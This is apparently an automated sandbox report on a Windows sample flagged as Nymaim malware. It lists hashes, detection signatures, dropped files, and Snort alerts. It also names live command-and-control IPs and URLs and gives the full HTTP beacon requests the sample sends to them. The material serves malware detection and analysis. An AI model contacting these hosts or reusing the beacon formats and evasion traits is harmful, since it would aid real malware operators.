Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 780214
MD5: bc7001afd99293bf22adcdf0d30c564a
SHA1: b6f97de078d7a18837811c9773d9cd817eeacaed
SHA256: dcb609a85203e7b8da330ad8f658a9b03a5d65170d02995fa6bf4d6e39c33b2a
Tags: exe
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Obfuscated command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Contains functionality to launch a program with higher privileges
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://171.22.30.106/library.php URL Reputation: Label: malware
Source: http://171.22.30.106/library.php4 Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.php. Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe ReversingLabs: Detection: 60%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.3.file.exe.24e15a0.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 1.0.file.tmp.4cc934.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.file.exe.23f54dc.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.file.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.HitFiles134.exe.10000000.5.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.file.tmp.4cc934.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.HitFiles134.exe.400000.1.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045C298 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 1_2_0045C298
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045C34C ArcFourCrypt, 1_2_0045C34C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045C364 ArcFourCrypt, 1_2_0045C364
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 2_2_00403770

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Unpacked PE file: 2.2.HitFiles134.exe.400000.1.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004738D8 FindFirstFileA,FindNextFileA,FindClose, 1_2_004738D8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00451D34 FindFirstFileA,GetLastError, 1_2_00451D34
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004960EC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004960EC
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00462DD8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00462DD8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00463254 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463254
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0046184C FindFirstFileA,FindNextFileA,FindClose, 1_2_0046184C
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user~1\AppData\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.7:49712 -> 45.139.105.171:80
Source: Traffic Snort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.7:49713 -> 107.182.129.235:80
Source: Traffic Snort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.7:49713 -> 107.182.129.235:80
Source: Traffic Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.7:49713
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 45.139.105.1
Source: Malware configuration extractor IPs: 85.31.46.167
Source: Malware configuration extractor IPs: 107.182.129.235
Source: Malware configuration extractor IPs: 171.22.30.106
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CMCSUS CMCSUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.139.105.171 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/extension.php
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://107.182.129.235/storage/ping.php
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.php.
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://171.22.30.106/library.php4
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, HitFiles134.exe, 00000002.00000002.331816078.00000000017F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
Source: file.tmp, 00000001.00000002.333569114.000000000018F000.00000004.00000010.00020000.00000000.sdmp, file.tmp, 00000001.00000002.334374587.0000000004620000.00000004.00001000.00020000.00000000.sdmp, is-ULQSL.tmp.1.dr, is-P2AUO.tmp.1.dr String found in binary or memory: http://rus.altarsoft.com/split_files.shtml
Source: file.tmp, 00000001.00000002.333569114.000000000018F000.00000004.00000010.00020000.00000000.sdmp, file.tmp, 00000001.00000002.334374587.0000000004620000.00000004.00001000.00020000.00000000.sdmp, is-7S1TU.tmp.1.dr, is-A3R8N.tmp.1.dr, is-UUBG5.tmp.1.dr, is-NN8RP.tmp.1.dr, is-7O8CS.tmp.1.dr, is-QV8JO.tmp.1.dr, is-JOJ80.tmp.1.dr, is-L1N1D.tmp.1.dr, is-BVH9M.tmp.1.dr, is-3NI9T.tmp.1.dr String found in binary or memory: http://www.altarsoft.com/split_files.shtml
Source: file.tmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000000.00000003.248037528.0000000002420000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.248226312.0000000002338000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr String found in binary or memory: http://www.remobjects.com/ps
Source: file.exe, 00000000.00000003.248037528.0000000002420000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.248226312.0000000002338000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr String found in binary or memory: http://www.remobjects.com/psU
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: global traffic HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Creates a DirectInput object (often for capturing keystrokes)
Source: file.tmp, 00000001.00000002.333991099.000000000079A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected Nymaim
Source: Yara match File source: 2.2.HitFiles134.exe.32d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HitFiles134.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HitFiles134.exe.32d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HitFiles134.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.332146458.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.330440301.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.332003406.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004093A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_004093A8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045476C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_0045476C
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040836C 0_2_0040836C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00466480 1_2_00466480
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0047E9B0 1_2_0047E9B0
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0046F05C 1_2_0046F05C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0043D2FC 1_2_0043D2FC
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0044401C 1_2_0044401C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045E1DC 1_2_0045E1DC
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045A284 1_2_0045A284
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004684F8 1_2_004684F8
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00444714 1_2_00444714
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00434874 1_2_00434874
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_004849D0 1_2_004849D0
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00430AB4 1_2_00430AB4
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00444B20 1_2_00444B20
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00450C90 1_2_00450C90
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00485904 1_2_00485904
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00443A74 1_2_00443A74
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00404490 2_2_00404490
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_004096F0 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_004056A0 2_2_004056A0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00406800 2_2_00406800
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00406AA0 2_2_00406AA0
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00404D40 2_2_00404D40
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00405F40 2_2_00405F40
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00402F20 2_2_00402F20
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_004150D3 2_2_004150D3
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00415305 2_2_00415305
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_004223A9 2_2_004223A9
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00419510 2_2_00419510
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00404840 2_2_00404840
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00426850 2_2_00426850
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00410A50 2_2_00410A50
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0042AB9A 2_2_0042AB9A
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00421C88 2_2_00421C88
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_0042ACBA 2_2_0042ACBA
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00447D2D 2_2_00447D2D
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00428D39 2_2_00428D39
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_00404F20 2_2_00404F20
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_1000F670 2_2_1000F670
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: 2_2_1000EC61 2_2_1000EC61
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00405964 appears 99 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00406A2C appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00403400 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00452618 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00445650 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 0040785C appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00408B74 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00403494 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 004568CC appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00445380 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00456AD8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00403684 appears 163 times
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: String function: 00433A88 appears 32 times
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: String function: 10003C50 appears 34 times
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe Code function: String function: 0040F9E0 appears 54 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0042F0EC NtdllDefWindowProc_A, 1_2_0042F0EC
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00423AF4 NtdllDefWindowProc_A, 1_2_00423AF4
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_0045614C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_0045614C
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00412548 NtdllDefWindowProc_A, 1_2_00412548
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp Code function: 1_2_00476F38 NtdllDefWindowProc_A, 1_2_00476F38
Contains functionality to communicate with device drivers
